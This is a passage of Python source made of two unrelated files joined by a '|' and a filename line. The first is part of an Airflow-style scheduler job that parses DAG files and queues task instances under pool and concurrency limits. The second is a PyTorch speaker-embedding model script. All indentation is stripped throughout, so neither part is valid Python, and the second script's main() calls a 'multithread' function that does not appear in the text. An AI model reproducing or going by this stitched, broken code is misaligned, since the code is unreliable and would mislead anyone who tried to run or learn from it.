if not dag.is_subdag:
dag_run = self.create_dag_run(dag)
if dag_run:
expected_start_date = dag.following_schedule(dag_run.execution_date)
if expected_start_date:
schedule_delay = dag_run.start_date - expected_start_date
Stats.timing(
'dagrun.schedule_delay.{dag_id}'.format(dag_id=dag.dag_id),
schedule_delay)
self.log.info("Created %s", dag_run)
self._process_task_instances(dag, tis_out)
if check_slas:
self.manage_slas(dag)
def _find_dags_to_process(self, dags: List[DAG], paused_dag_ids: Set[str]):
"""
Find the DAGs that are not paused to process.
:param dags: specified DAGs
:param paused_dag_ids: paused DAG IDs
:return: DAGs to process
"""
if len(self.dag_ids) > 0:
dags = [dag for dag in dags
if dag.dag_id in self.dag_ids and
dag.dag_id not in paused_dag_ids]
else:
dags = [dag for dag in dags
if dag.dag_id not in paused_dag_ids]
return dags
@provide_session
def process_file(self, file_path, zombies, pickle_dags=False, session=None):
"""
Process a Python file containing Airflow DAGs.
This includes:
1. Execute the file and look for DAG objects in the namespace.
2. Pickle the DAG and save it to the DB (if necessary).
3. For each DAG, see what tasks should run and create appropriate task
instances in the DB.
4. Record any errors importing the file into ORM
5. Kill (in ORM) any task instances belonging to the DAGs that haven't
issued a heartbeat in a while.
Returns a list of SimpleDag objects that represent the DAGs found in
the file
:param file_path: the path to the Python file that should be executed
:type file_path: str
:param zombies: zombie task instances to kill.
:type zombies: List[airflow.models.taskinstance.SimpleTaskInstance]
:param pickle_dags: whether serialize the DAGs found in the file and
save them to the db
:type pickle_dags: bool
:return: a list of SimpleDags made from the Dags found in the file
:rtype: List[airflow.utils.dag_processing.SimpleDagBag]
"""
self.log.info("Processing file %s for tasks to queue", file_path)
# As DAGs are parsed from this file, they will be converted into SimpleDags
simple_dags = []
try:
dagbag = models.DagBag(file_path, include_examples=False)
except Exception:
self.log.exception("Failed at reloading the DAG file %s", file_path)
Stats.incr('dag_file_refresh_error', 1, 1)
return [], []
if len(dagbag.dags) > 0:
self.log.info("DAG(s) %s retrieved from %s", dagbag.dags.keys(), file_path)
else:
self.log.warning("No viable dags retrieved from %s", file_path)
self.update_import_errors(session, dagbag)
return [], len(dagbag.import_errors)
# Save individual DAGs in the ORM and update DagModel.last_scheduled_time
for dag in dagbag.dags.values():
dag.sync_to_db()
paused_dag_ids = {dag.dag_id for dag in dagbag.dags.values() if dag.is_paused}
# Pickle the DAGs (if necessary) and put them into a SimpleDag
for dag_id in dagbag.dags:
# Only return DAGs that are not paused
if dag_id not in paused_dag_ids:
dag = dagbag.get_dag(dag_id)
pickle_id = None
if pickle_dags:
pickle_id = dag.pickle(session).id
simple_dags.append(SimpleDag(dag, pickle_id=pickle_id))
dags = self._find_dags_to_process(dagbag.dags.values(), paused_dag_ids)
# Not using multiprocessing.Queue() since it's no longer a separate
# process and due to some unusual behavior. (empty() incorrectly
# returns true as described in https://bugs.python.org/issue23582 )
ti_keys_to_schedule = []
refreshed_tis = []
self._process_dags(dagbag, dags, ti_keys_to_schedule)
# Refresh all task instances that will be scheduled
TI = models.TaskInstance
filter_for_tis = TI.filter_for_tis(ti_keys_to_schedule)
if filter_for_tis is not None:
refreshed_tis = session.query(TI).filter(filter_for_tis).with_for_update().all()
for ti in refreshed_tis:
# Add task to task instance
dag = dagbag.dags[ti.key[0]]
ti.task = dag.get_task(ti.key[1])
# We check only deps needed to set TI to SCHEDULED state here.
# Deps needed to set TI to QUEUED state will be batch checked later
# by the scheduler for better performance.
dep_context = DepContext(deps=SCHEDULED_DEPS, ignore_task_deps=True)
# Only schedule tasks that have their dependencies met, e.g. to avoid
# a task that recently got its state changed to RUNNING from somewhere
# other than the scheduler from getting its state overwritten.
if ti.are_dependencies_met(
dep_context=dep_context,
session=session,
verbose=True
):
# Task starts out in the scheduled state. All tasks in the
# scheduled state will be sent to the executor
ti.state = State.SCHEDULED
# Also save this task instance to the DB.
self.log.info("Creating / updating %s in ORM", ti)
session.merge(ti)
# commit batch
session.commit()
# Record import errors into the ORM
try:
self.update_import_errors(session, dagbag)
except Exception:
self.log.exception("Error logging import errors!")
try:
dagbag.kill_zombies(zombies)
except Exception:
self.log.exception("Error killing zombies!")
return simple_dags, len(dagbag.import_errors)
class SchedulerJob(BaseJob):
"""
This SchedulerJob runs for a specific time interval and schedules the jobs
that are ready to run. It figures out the latest runs for each
task and sees if the dependencies for the next schedules are met.
If so, it creates appropriate TaskInstances and sends run commands to the
executor. It does this for each task in each DAG and repeats.
:param dag_id: if specified, only schedule tasks with this DAG ID
:type dag_id: str
:param dag_ids: if specified, only schedule tasks with these DAG IDs
:type dag_ids: list[str]
:param subdir: directory containing Python files with Airflow DAG
definitions, or a specific path to a file
:type subdir: str
:param num_runs: The number of times to try to schedule each DAG file.
-1 for unlimited times.
:type num_runs: int
:param processor_poll_interval: The number of seconds to wait between
polls of running processors
:type processor_poll_interval: int
:param do_pickle: once a DAG object is obtained by executing the Python
file, whether to serialize the DAG object to the DB
:type do_pickle: bool
"""
__mapper_args__ = {
'polymorphic_identity': 'SchedulerJob'
}
heartrate = conf.getint('scheduler', 'SCHEDULER_HEARTBEAT_SEC')
def __init__(
self,
dag_id=None,
dag_ids=None,
subdir=settings.DAGS_FOLDER,
num_runs=conf.getint('scheduler', 'num_runs'),
processor_poll_interval=conf.getfloat('scheduler', 'processor_poll_interval'),
do_pickle=False,
log=None,
*args, **kwargs):
# for BaseJob compatibility
self.dag_id = dag_id
self.dag_ids = [dag_id] if dag_id else []
if dag_ids:
self.dag_ids.extend(dag_ids)
self.subdir = subdir
self.num_runs = num_runs
self._processor_poll_interval = processor_poll_interval
self.do_pickle = do_pickle
super().__init__(*args, **kwargs)
self.max_threads = conf.getint('scheduler', 'max_threads')
if log:
self._log = log
self.using_sqlite = False
self.using_mysql = False
if conf.get('core', 'sql_alchemy_conn').lower().startswith('sqlite'):
self.using_sqlite = True
if conf.get('core', 'sql_alchemy_conn').lower().startswith('mysql'):
self.using_mysql = True
self.max_tis_per_query = conf.getint('scheduler', 'max_tis_per_query')
self.processor_agent = None
signal.signal(signal.SIGINT, self._exit_gracefully)
signal.signal(signal.SIGTERM, self._exit_gracefully)
def _exit_gracefully(self, signum, frame):
"""
Helper method to clean up processor_agent to avoid leaving orphan processes.
"""
self.log.info("Exiting gracefully upon receiving signal %s", signum)
if self.processor_agent:
self.processor_agent.end()
sys.exit(os.EX_OK)
def is_alive(self, grace_multiplier=None):
"""
Is this SchedulerJob alive?
We define alive as in a state of running and a heartbeat within the
threshold defined in the ``scheduler_health_check_threshold`` config
setting.
``grace_multiplier`` is accepted for compatibility with the parent class.
:rtype: boolean
"""
if grace_multiplier is not None:
# Accept the same behaviour as superclass
return super().is_alive(grace_multiplier=grace_multiplier)
scheduler_health_check_threshold = conf.getint('scheduler', 'scheduler_health_check_threshold')
return (
self.state == State.RUNNING and
(timezone.utcnow() - self.latest_heartbeat).seconds < scheduler_health_check_threshold
)
@provide_session
def _change_state_for_tis_without_dagrun(self,
simple_dag_bag,
old_states,
new_state,
session=None):
"""
For all DAG IDs in the SimpleDagBag, look for task instances in the
old_states and set them to new_state if the corresponding DagRun
does not exist or exists but is not in the running state. This
normally should not happen, but it can if the state of DagRuns are
changed manually.
:param old_states: examine TaskInstances in this state
:type old_states: list[airflow.utils.state.State]
:param new_state: set TaskInstances to this state
:type new_state: airflow.utils.state.State
:param simple_dag_bag: TaskInstances associated with DAGs in the
simple_dag_bag and with states in the old_states will be examined
:type simple_dag_bag: airflow.utils.dag_processing.SimpleDagBag
"""
tis_changed = 0
query = session \
.query(models.TaskInstance) \
.outerjoin(models.DagRun, and_(
models.TaskInstance.dag_id == models.DagRun.dag_id,
models.TaskInstance.execution_date == models.DagRun.execution_date)) \
.filter(models.TaskInstance.dag_id.in_(simple_dag_bag.dag_ids)) \
.filter(models.TaskInstance.state.in_(old_states)) \
.filter(or_(
models.DagRun.state != State.RUNNING,
models.DagRun.state.is_(None)))
# We need to do this for mysql as well because it can cause deadlocks
# as discussed in https://issues.apache.org/jira/browse/AIRFLOW-2516
if self.using_sqlite or self.using_mysql:
tis_to_change = query \
.with_for_update() \
.all()
for ti in tis_to_change:
ti.set_state(new_state, session=session)
tis_changed += 1
else:
subq = query.subquery()
tis_changed = session \
.query(models.TaskInstance) \
.filter(and_(
models.TaskInstance.dag_id == subq.c.dag_id,
models.TaskInstance.task_id == subq.c.task_id,
models.TaskInstance.execution_date ==
subq.c.execution_date)) \
.update({models.TaskInstance.state: new_state}, synchronize_session=False)
session.commit()
if tis_changed > 0:
self.log.warning(
"Set %s task instances to state=%s as their associated DagRun was not in RUNNING state",
tis_changed, new_state
)
Stats.gauge('scheduler.tasks.without_dagrun', tis_changed)
@provide_session
def __get_concurrency_maps(self, states, session=None):
"""
Get the concurrency maps.
:param states: List of states to query for
:type states: list[airflow.utils.state.State]
:return: A map from (dag_id, task_id) to # of task instances and
a map from (dag_id, task_id) to # of task instances in the given state list
:rtype: dict[tuple[str, str], int]
"""
TI = models.TaskInstance
ti_concurrency_query = (
session
.query(TI.task_id, TI.dag_id, func.count('*'))
.filter(TI.state.in_(states))
.group_by(TI.task_id, TI.dag_id)
).all()
dag_map = defaultdict(int)
task_map = defaultdict(int)
for result in ti_concurrency_query:
task_id, dag_id, count = result
dag_map[dag_id] += count
task_map[(dag_id, task_id)] = count
return dag_map, task_map
@provide_session
def _find_executable_task_instances(self, simple_dag_bag, states, session=None):
"""
Finds TIs that are ready for execution with respect to pool limits,
dag concurrency, executor state, and priority.
:param simple_dag_bag: TaskInstances associated with DAGs in the
simple_dag_bag will be fetched from the DB and executed
:type simple_dag_bag: airflow.utils.dag_processing.SimpleDagBag
:param executor: the executor that runs task instances
:type executor: BaseExecutor
:param states: Execute TaskInstances in these states
:type states: tuple[airflow.utils.state.State]
:return: list[airflow.models.TaskInstance]
"""
from airflow.jobs.backfill_job import BackfillJob # Avoid circular import
executable_tis = []
# Get all task instances associated with scheduled
# DagRuns which are not backfilled, in the given states,
# and the dag is not paused
TI = models.TaskInstance
DR = models.DagRun
DM = models.DagModel
ti_query = (
session
.query(TI)
.filter(TI.dag_id.in_(simple_dag_bag.dag_ids))
.outerjoin(
DR,
and_(DR.dag_id == TI.dag_id, DR.execution_date == TI.execution_date)
)
.filter(or_(DR.run_id == None, # noqa: E711 pylint: disable=singleton-comparison
not_(DR.run_id.like(BackfillJob.ID_PREFIX + '%'))))
.outerjoin(DM, DM.dag_id == TI.dag_id)
.filter(or_(DM.dag_id == None, # noqa: E711 pylint: disable=singleton-comparison
not_(DM.is_paused)))
)
# Additional filters on task instance state
if states:
if None in states:
if all(x is None for x in states):
ti_query = ti_query.filter(TI.state == None) # noqa pylint: disable=singleton-comparison
else:
not_none_states = [state for state in states if state]
ti_query = ti_query.filter(
or_(TI.state == None, # noqa: E711 pylint: disable=singleton-comparison
TI.state.in_(not_none_states))
)
else:
ti_query = ti_query.filter(TI.state.in_(states))
task_instances_to_examine = ti_query.all()
if len(task_instances_to_examine) == 0:
self.log.debug("No tasks to consider for execution.")
return executable_tis
# Put one task instance on each line
task_instance_str = "\n\t".join(
[repr(x) for x in task_instances_to_examine])
self.log.info(
"%s tasks up for execution:\n\t%s", len(task_instances_to_examine),
task_instance_str
)
# Get the pool settings
pools = {p.pool: p for p in session.query(models.Pool).all()}
pool_to_task_instances = defaultdict(list)
for task_instance in task_instances_to_examine:
pool_to_task_instances[task_instance.pool].append(task_instance)
# dag_id to # of running tasks and (dag_id, task_id) to # of running tasks.
dag_concurrency_map, task_concurrency_map = self.__get_concurrency_maps(
states=STATES_TO_COUNT_AS_RUNNING, session=session)
# Go through each pool, and queue up a task for execution if there are
# any open slots in the pool.
for pool, task_instances in pool_to_task_instances.items():
pool_name = pool
if pool not in pools:
self.log.warning(
"Tasks using non-existent pool '%s' will not be scheduled",
pool
)
continue
else:
open_slots = pools[pool].open_slots(session=session)
num_ready = len(task_instances)
self.log.info(
"Figuring out tasks to run in Pool(name=%s) with %s open slots "
"and %s task instances ready to be queued",
pool, open_slots, num_ready
)
priority_sorted_task_instances = sorted(
task_instances, key=lambda ti: (-ti.priority_weight, ti.execution_date))
# Number of tasks that cannot be scheduled because of no open slot in pool
num_starving_tasks = 0
num_tasks_in_executor = 0
for current_index, task_instance in enumerate(priority_sorted_task_instances):
if open_slots <= 0:
self.log.info(
"Not scheduling since there are %s open slots in pool %s",
open_slots, pool
)
# Can't schedule any more since there are no more open slots.
num_starving_tasks = len(priority_sorted_task_instances) - current_index
break
# Check to make sure that the task concurrency of the DAG hasn't been
# reached.
dag_id = task_instance.dag_id
simple_dag = simple_dag_bag.get_dag(dag_id)
current_dag_concurrency = dag_concurrency_map[dag_id]
dag_concurrency_limit = simple_dag_bag.get_dag(dag_id).concurrency
self.log.info(
"DAG %s has %s/%s running and queued tasks",
dag_id, current_dag_concurrency, dag_concurrency_limit
)
if current_dag_concurrency >= dag_concurrency_limit:
self.log.info(
"Not executing %s since the number of tasks running or queued "
"from DAG %s is >= to the DAG's task concurrency limit of %s",
task_instance, dag_id, dag_concurrency_limit
)
continue
task_concurrency_limit = simple_dag.get_task_special_arg(
task_instance.task_id,
'task_concurrency')
if task_concurrency_limit is not None:
current_task_concurrency = task_concurrency_map[
(task_instance.dag_id, task_instance.task_id)
]
if current_task_concurrency >= task_concurrency_limit:
self.log.info("Not executing %s since the task concurrency for"
" this task has been reached.", task_instance)
continue
if self.executor.has_task(task_instance):
self.log.debug(
"Not handling task %s as the executor reports it is running",
task_instance.key
)
num_tasks_in_executor += 1
continue
executable_tis.append(task_instance)
open_slots -= 1
dag_concurrency_map[dag_id] += 1
task_concurrency_map[(task_instance.dag_id, task_instance.task_id)] += 1
Stats.gauge('pool.starving_tasks.{pool_name}'.format(pool_name=pool_name),
num_starving_tasks)
Stats.gauge('pool.open_slots.{pool_name}'.format(pool_name=pool_name),
pools[pool_name].open_slots())
Stats.gauge('pool.used_slots.{pool_name}'.format(pool_name=pool_name),
pools[pool_name].occupied_slots())
Stats.gauge('scheduler.tasks.pending', len(task_instances_to_examine))
Stats.gauge('scheduler.tasks.running', num_tasks_in_executor)
Stats.gauge('scheduler.tasks.starving', num_starving_tasks)
Stats.gauge('scheduler.tasks.executable', len(executable_tis))
task_instance_str = "\n\t".join(
[repr(x) for x in executable_tis])
self.log.info(
"Setting the following tasks to queued state:\n\t%s", task_instance_str)
# so these dont expire on commit
for ti in executable_tis:
copy_dag_id = ti.dag_id
copy_execution_date = ti.execution_date
copy_task_id = ti.task_id
make_transient(ti)
ti.dag_id = copy_dag_id
ti.execution_date = copy_execution_date
ti.task_id = copy_task_id
return executable_tis
@provide_session
def _change_state_for_executable_task_instances(self, task_instances,
acceptable_states, session=None):
"""
Changes the state of task instances in the list with one of the given states
to QUEUED atomically, and returns the TIs changed in SimpleTaskInstance format.
:param task_instances: TaskInstances to change the state of
:type task_instances: list[airflow.models.TaskInstance]
:param acceptable_states: Filters the TaskInstances updated to be in these states
:type acceptable_states: Iterable[State]
:rtype: list[airflow.models.taskinstance.SimpleTaskInstance]
"""
if len(task_instances) == 0:
session.commit()
return []
TI = models.TaskInstance
filter_for_ti_state_change = (
[and_(
TI.dag_id == ti.dag_id,
TI.task_id == ti.task_id,
TI.execution_date == ti.execution_date)
for ti in task_instances])
ti_query = (
session
.query(TI)
.filter(or_(*filter_for_ti_state_change)))
if acceptable_states:
if None in acceptable_states:
if all(x is None for x in acceptable_states):
ti_query = ti_query.filter(TI.state == None) # noqa pylint: disable=singleton-comparison
else:
not_none_acceptable_states = [state for state in acceptable_states if state]
ti_query = ti_query.filter(
or_(TI.state == None, # noqa pylint: disable=singleton-comparison
TI.state.in_(not_none_acceptable_states))
)
else:
ti_query = ti_query.filter(TI.state.in_(acceptable_states))
tis_to_set_to_queued = (
ti_query
.with_for_update()
.all())
if len(tis_to_set_to_queued) == 0:
self.log.info("No tasks were able to have their state changed to queued.")
session.commit()
return []
# set TIs to queued state
filter_for_tis = TI.filter_for_tis(tis_to_set_to_queued)
session.query(TI).filter(filter_for_tis).update(
{TI.state: State.QUEUED, TI.queued_dttm: timezone.utcnow()}, synchronize_session=False
)
session.commit()
# Generate a list of SimpleTaskInstance for the use of queuing
# them in the executor.
simple_task_instances = [SimpleTaskInstance(ti) for ti in tis_to_set_to_queued]
task_instance_str = "\n\t".join([repr(x) for x in tis_to_set_to_queued])
self.log.info("Setting the following %s tasks to queued state:\n\t%s",
len(tis_to_set_to_queued), task_instance_str)
return simple_task_instances
def _enqueue_task_instances_with_queued_state(self, simple_dag_bag,
simple_task_instances):
"""
Takes task_instances, which should have been set to queued, and enqueues them
with the executor.
:param simple_task_instances: TaskInstances to enqueue
:type simple_task_instances: list[SimpleTaskInstance]
:param simple_dag_bag: Should contains all of the task_instances' dags
:type simple_dag_bag: airflow.utils.dag_processing.SimpleDagBag
"""
TI = models.TaskInstance
# actually enqueue them
for simple_task_instance in simple_task_instances:
simple_dag = simple_dag_bag.get_dag(simple_task_instance.dag_id)
command = TI.generate_command(
simple_task_instance.dag_id,
simple_task_instance.task_id,
simple_task_instance.execution_date,
local=True,
mark_success=False,
ignore_all_deps=False,
ignore_depends_on_past=False,
ignore_task_deps=False,
ignore_ti_state=False,
pool=simple_task_instance.pool,
file_path=simple_dag.full_filepath,
pickle_id=simple_dag.pickle_id)
priority = simple_task_instance.priority_weight
queue = simple_task_instance.queue
self.log.info(
"Sending %s to executor with priority %s and queue %s",
simple_task_instance.key, priority, queue
)
self.executor.queue_command(
simple_task_instance,
command,
priority=priority,
queue=queue)
@provide_session
def _execute_task_instances(self,
simple_dag_bag,
states,
session=None):
"""
Attempts to execute TaskInstances that should be executed by the scheduler.
There are three steps:
1. Pick TIs by priority with the constraint that they are in the expected states
and that we do exceed max_active_runs or pool limits.
2. Change the state for the TIs above atomically.
3. Enqueue the TIs in the executor.
:param simple_dag_bag: TaskInstances associated with DAGs in the
simple_dag_bag will be fetched from the DB and executed
:type simple_dag_bag: airflow.utils.dag_processing.SimpleDagBag
:param states: Execute TaskInstances in these states
:type states: tuple[airflow.utils.state.State]
:return: Number of task instance with state changed.
"""
executable_tis = self._find_executable_task_instances(simple_dag_bag, states,
session=session)
def query(result, items):
simple_tis_with_state_changed = \
self._change_state_for_executable_task_instances(items,
states,
session=session)
self._enqueue_task_instances_with_queued_state(
simple_dag_bag,
simple_tis_with_state_changed)
session.commit()
return result + len(simple_tis_with_state_changed)
return helpers.reduce_in_chunks(query, executable_tis, 0, self.max_tis_per_query)
@provide_session
def _change_state_for_tasks_failed_to_execute(self, session):
"""
If there are tasks left over in the executor,
we set them back to SCHEDULED to avoid creating hanging tasks.
:param session: session for ORM operations
"""
if self.executor.queued_tasks:
TI = models.TaskInstance
filter_for_ti_state_change = (
[and_(
TI.dag_id == dag_id,
TI.task_id == task_id,
TI.execution_date == execution_date,
# The TI.try_number will return raw try_number+1 since the
# ti is not running. And we need to -1 to match the DB record.
TI._try_number == try_number - 1,
TI.state == State.QUEUED)
for dag_id, task_id, execution_date, try_number
in self.executor.queued_tasks.keys()])
ti_query = (session.query(TI)
.filter(or_(*filter_for_ti_state_change)))
tis_to_set_to_scheduled = (ti_query
.with_for_update()
.all())
if len(tis_to_set_to_scheduled) == 0:
session.commit()
return
# set TIs to queued state
filter_for_tis = TI.filter_for_tis(tis_to_set_to_scheduled)
session.query(TI).filter(filter_for_tis).update(
{TI.state: State.SCHEDULED, TI.queued_dttm: None}, synchronize_session=False
)
for task_instance in tis_to_set_to_scheduled:
self.executor.queued_tasks.pop(task_instance.key)
task_instance_str = "\n\t".join(
[repr(x) for x in tis_to_set_to_scheduled])
session.commit()
self.log.info("Set the following tasks to scheduled state:\n\t%s", task_instance_str)
@provide_session
def _process_executor_events(self, simple_dag_bag, session=None):
"""
Respond to executor events.
"""
# TODO: this shares quite a lot of code with _manage_executor_state
TI = models.TaskInstance
for key, state in list(self.executor.get_event_buffer(simple_dag_bag.dag_ids)
.items()):
dag_id, task_id, execution_date, try_number = key
self.log.info(
"Executor reports execution of %s.%s execution_date=%s "
"exited with status %s for try_number %s",
dag_id, task_id, execution_date, state, try_number
)
if state == State.FAILED or state == State.SUCCESS:
qry = session.query(TI).filter(TI.dag_id == dag_id,
TI.task_id == task_id,
TI.execution_date == execution_date)
ti = qry.first()
if not ti:
self.log.warning("TaskInstance %s went missing from the database", ti)
continue
# TODO: should we fail RUNNING as well, as we do in Backfills?
if ti.try_number == try_number and ti.state == State.QUEUED:
msg = ("Executor reports task instance {} finished ({}) "
"although the task says its {}. Was the task "
"killed externally?".format(ti, state, ti.state))
Stats.incr('scheduler.tasks.killed_externally')
self.log.error(msg)
try:
simple_dag = simple_dag_bag.get_dag(dag_id)
dagbag = models.DagBag(simple_dag.full_filepath)
dag = dagbag.get_dag(dag_id)
ti.task = dag.get_task(task_id)
ti.handle_failure(msg)
except Exception:
self.log.error("Cannot load the dag bag to handle failure for %s"
". Setting task to FAILED without callbacks or "
"retries. Do you have enough resources?", ti)
ti.state = State.FAILED
session.merge(ti)
session.commit()
def _execute(self):
self.log.info("Starting the scheduler")
# DAGs can be pickled for easier remote execution by some executors
pickle_dags = False
if self.do_pickle and self.executor.__class__ not in (LocalExecutor, SequentialExecutor):
pickle_dags = True
self.log.info("Processing each file at most %s times", self.num_runs)
# Build up a list of Python files that could contain DAGs
self.log.info("Searching for files in %s", self.subdir)
known_file_paths = list_py_file_paths(self.subdir)
self.log.info("There are %s files in %s", len(known_file_paths), self.subdir)
def processor_factory(file_path, zombies):
return DagFileProcessorProcess(
file_path=file_path,
pickle_dags=pickle_dags,
dag_id_white_list=self.dag_ids,
zombies=zombies
)
# When using sqlite, we do not use async_mode
# so the scheduler job and DAG parser don't access the DB at the same time.
async_mode = not self.using_sqlite
processor_timeout_seconds = conf.getint('core', 'dag_file_processor_timeout')
processor_timeout = timedelta(seconds=processor_timeout_seconds)
self.processor_agent = DagFileProcessorAgent(self.subdir,
known_file_paths,
self.num_runs,
processor_factory,
processor_timeout,
async_mode)
try:
self._execute_helper()
except Exception:
self.log.exception("Exception when executing execute_helper")
finally:
self.processor_agent.end()
self.log.info("Exited execute loop")
def _get_simple_dags(self):
return self.processor_agent.harvest_simple_dags()
def _execute_helper(self):
"""
The actual scheduler loop. The main steps in the loop are:
#. Harvest DAG parsing results through DagFileProcessorAgent
#. Find and queue executable tasks
#. Change task instance state in DB
#. Queue tasks in executor
#. Heartbeat executor
#. Execute queued tasks in executor asynchronously
#. Sync on the states of running tasks
Following is a graphic representation of these steps.
.. image:: ../docs/img/scheduler_loop.jpg
:rtype: None
"""
self.executor.start()
self.log.info("Resetting orphaned tasks for active dag runs")
self.reset_state_for_orphaned_tasks()
# Start after resetting orphaned tasks to avoid stressing out DB.
self.processor_agent.start()
execute_start_time = timezone.utcnow()
# Last time that self.heartbeat() was called.
last_self_heartbeat_time = timezone.utcnow()
is_unit_test = conf.getboolean('core', 'unit_test_mode')
# For the execute duration, parse and schedule DAGs
while True:
loop_start_time = time.time()
if self.using_sqlite:
self.processor_agent.heartbeat()
# For the sqlite case w/ 1 thread, wait until the processor
# is finished to avoid concurrent access to the DB.
self.log.debug(
"Waiting for processors to finish since we're using sqlite")
self.processor_agent.wait_until_finished()
simple_dags = self._get_simple_dags()
self.log.debug("Harvested {} SimpleDAGs".format(len(simple_dags)))
# Send tasks for execution if available
simple_dag_bag = SimpleDagBag(simple_dags)
if not self._validate_and_run_task_instances(simple_dag_bag=simple_dag_bag):
continue
# Heartbeat the scheduler periodically
time_since_last_heartbeat = (timezone.utcnow() -
last_self_heartbeat_time).total_seconds()
if time_since_last_heartbeat > self.heartrate:
self.log.debug("Heartbeating the scheduler")
self.heartbeat()
last_self_heartbeat_time = timezone.utcnow()
loop_end_time = time.time()
loop_duration = loop_end_time - loop_start_time
self.log.debug(
"Ran scheduling loop in %.2f seconds",
loop_duration)
if not is_unit_test:
time.sleep(self._processor_poll_interval)
if self.processor_agent.done:
self.log.info("Exiting scheduler loop as all files"
" have been processed {} times".format(self.num_runs))
break
# Stop any processors
self.processor_agent.terminate()
# Verify that all files were processed, and if so, deactivate DAGs that
# haven't been touched by the scheduler as they likely have been
# deleted.
if self.processor_agent.all_files_processed:
self.log.info(
"Deactivating DAGs that haven't been touched since %s",
execute_start_time.isoformat()
)
models.DAG.deactivate_stale_dags(execute_start_time)
self.executor.end()
settings.Session.remove()
def _validate_and_run_task_instances(self, simple_dag_bag):
if len(simple_dag_bag.simple_dags) > 0:
try:
self._process_and_execute_tasks(simple_dag_bag)
except Exception as e:
self.log.error("Error queuing tasks")
self.log.exception(e)
return False
# Call heartbeats
self.log.debug("Heartbeating the executor")
self.executor.heartbeat()
self._change_state_for_tasks_failed_to_execute()
# Process events from the executor
self._process_executor_events(simple_dag_bag)
return True
def _process_and_execute_tasks(self, simple_dag_bag):
# Handle cases where a DAG run state is set (perhaps manually) to
# a non-running state. Handle task instances that belong to
# DAG runs in those states
# If a task instance is up for retry but the corresponding DAG run
# isn't running, mark the task instance as FAILED so we don't try
# to re-run it.
self._change_state_for_tis_without_dagrun(simple_dag_bag,
[State.UP_FOR_RETRY],
State.FAILED)
# If a task instance is scheduled or queued or up for reschedule,
# but the corresponding DAG run isn't running, set the state to
# NONE so we don't try to re-run it.
self._change_state_for_tis_without_dagrun(simple_dag_bag,
[State.QUEUED,
State.SCHEDULED,
State.UP_FOR_RESCHEDULE],
State.NONE)
self._execute_task_instances(simple_dag_bag,
(State.SCHEDULED,))
@provide_session
def heartbeat_callback(self, session=None):
Stats.incr('scheduler_heartbeat', 1, 1)
|
speaker_embed.py
|
import csv
import functools
import multiprocessing
import os
import threading
import numpy as np
import pyworld
import soundfile as sf
import torch
from scipy import stats
class EmbedModel1d(torch.nn.Module):
def __init__(self, n_freq, n_frames):
super(EmbedModel1d, self).__init__()
self.conv1a = torch.nn.Conv1d(n_freq, 512, kernel_size=3, dilation=1, padding='same')
self.conv1b = torch.nn.Conv1d(512, 512, kernel_size=3, dilation=1, padding='same')
self.drop1 = torch.nn.Dropout(p=0.2)
self.conv2a = torch.nn.Conv1d(512, 512, kernel_size=3, dilation=1, padding='same')
self.conv2b = torch.nn.Conv1d(512, 512, kernel_size=3, dilation=1, padding='same')
self.drop2 = torch.nn.Dropout(p=0.2)
self.conv3 = torch.nn.Conv1d(512, 2048, kernel_size=3, dilation=1, padding='same')
self.line3 = torch.nn.Linear(4096, 512)
def _max_pooling(self, x):
return x.max(dim=2)[0]
def forward(self, x):
x = torch.permute(x, dims=[0, 2, 1])
x = torch.nn.functional.relu(self.conv1a(x))
x = torch.nn.functional.relu(self.conv1b(x))
x = self.drop1(x)
x = torch.nn.functional.relu(self.conv2a(x))
x = torch.nn.functional.relu(self.conv2b(x))
x = self.drop2(x)
x = self.conv3(x)
x = self._max_pooling(x)
x = self.line3(x)
return x
class EmbedModel2d(torch.nn.Module):
def __init__(self, n_freq, n_frames):
super(EmbedModel2d, self).__init__()
self.conv1a = torch.nn.Conv2d(1, 64, kernel_size=(5, 5), dilation=(1, 1), padding='same')
self.conv1b = torch.nn.Conv2d(64, 64, kernel_size=(5, 5), dilation=(1, 1), padding='same')
self.drop1 = torch.nn.Dropout2d(p=0.2)
self.pool1 = torch.nn.MaxPool2d(kernel_size=(1, 4))
self.conv2a = torch.nn.Conv2d(64, 128, kernel_size=(5, 5), dilation=(1, 1), padding='same')
self.conv2b = torch.nn.Conv2d(128, 128, kernel_size=(5, 5), dilation=(1, 1), padding='same')
self.drop2 = torch.nn.Dropout2d(p=0.2)
self.pool2 = torch.nn.MaxPool2d(kernel_size=(1, 4))
self.conv3a = torch.nn.Conv2d(128, 256, kernel_size=(5, 5), dilation=(1, 1), padding='same')
self.conv3b = torch.nn.Conv2d(256, 256, kernel_size=(5, 5), dilation=(1, 1), padding='same')
self.drop3 = torch.nn.Dropout2d(p=0.2)
self.pool3 = torch.nn.MaxPool2d(kernel_size=(1, 4))
self.conv4 = torch.nn.Conv2d(256, 2048, kernel_size=(5, 5), dilation=(1, 1), padding='same')
self.line4 = torch.nn.Linear(2048, 512)
def _max_pooling(self, x):
return x.max(dim=3)[0].max(dim=2)[0]
def forward(self, x):
x = torch.unsqueeze(x, 1)
x = torch.nn.functional.relu(self.conv1a(x))
x = torch.nn.functional.relu(self.conv1b(x))
x = self.drop1(x)
x = self.pool1(x)
x = torch.nn.functional.relu(self.conv2a(x))
x = torch.nn.functional.relu(self.conv2b(x))
x = self.drop2(x)
x = self.pool2(x)
x = torch.nn.functional.relu(self.conv3a(x))
x = torch.nn.functional.relu(self.conv3b(x))
x = self.drop3(x)
x = self.pool3(x)
x = self.conv4(x)
x = self._max_pooling(x)
x = self.line4(x)
return x
class FullModel(torch.nn.Module):
def __init__(self, dim, n_freq=512, n_frames=32, nclasses=16):
super(FullModel, self).__init__()
if dim == 1:
self.embed = EmbedModel1d(n_freq, n_frames)
elif dim == 2:
self.embed = EmbedModel2d(n_freq, n_frames)
else:
raise ValueError('引数dimは1~2である必要があります。')
self.drop1 = torch.nn.Dropout(p=0.2)
self.line2 = torch.nn.Linear(512, 1024)
self.drop2 = torch.nn.Dropout(p=0.2)
self.line3 = torch.nn.Linear(1024, nclasses)
def forward(self, x):
x = torch.nn.functional.relu(self.embed(x))
x = self.drop1(x)
x = torch.nn.functional.relu(self.line2(x))
x = self.drop2(x)
x = torch.nn.functional.log_softmax(self.line3(x), dim=-1)
return x
def main():
ngpus = 4
lock = threading.Lock()
results = dict()
threads = list()
for thread_id in range(ngpus):
thread = threading.Thread(target=multithread, args=([thread_id, ngpus, lock, results]))
thread.start()
threads.append(thread)
for thread in threads:
thread.join()
speaker_embed_list = np.vstack([results[i] for i in range(ngpus)])
np.savez_compressed(f'resource/speaker-embeds.npz', embed=speaker_embed_list)
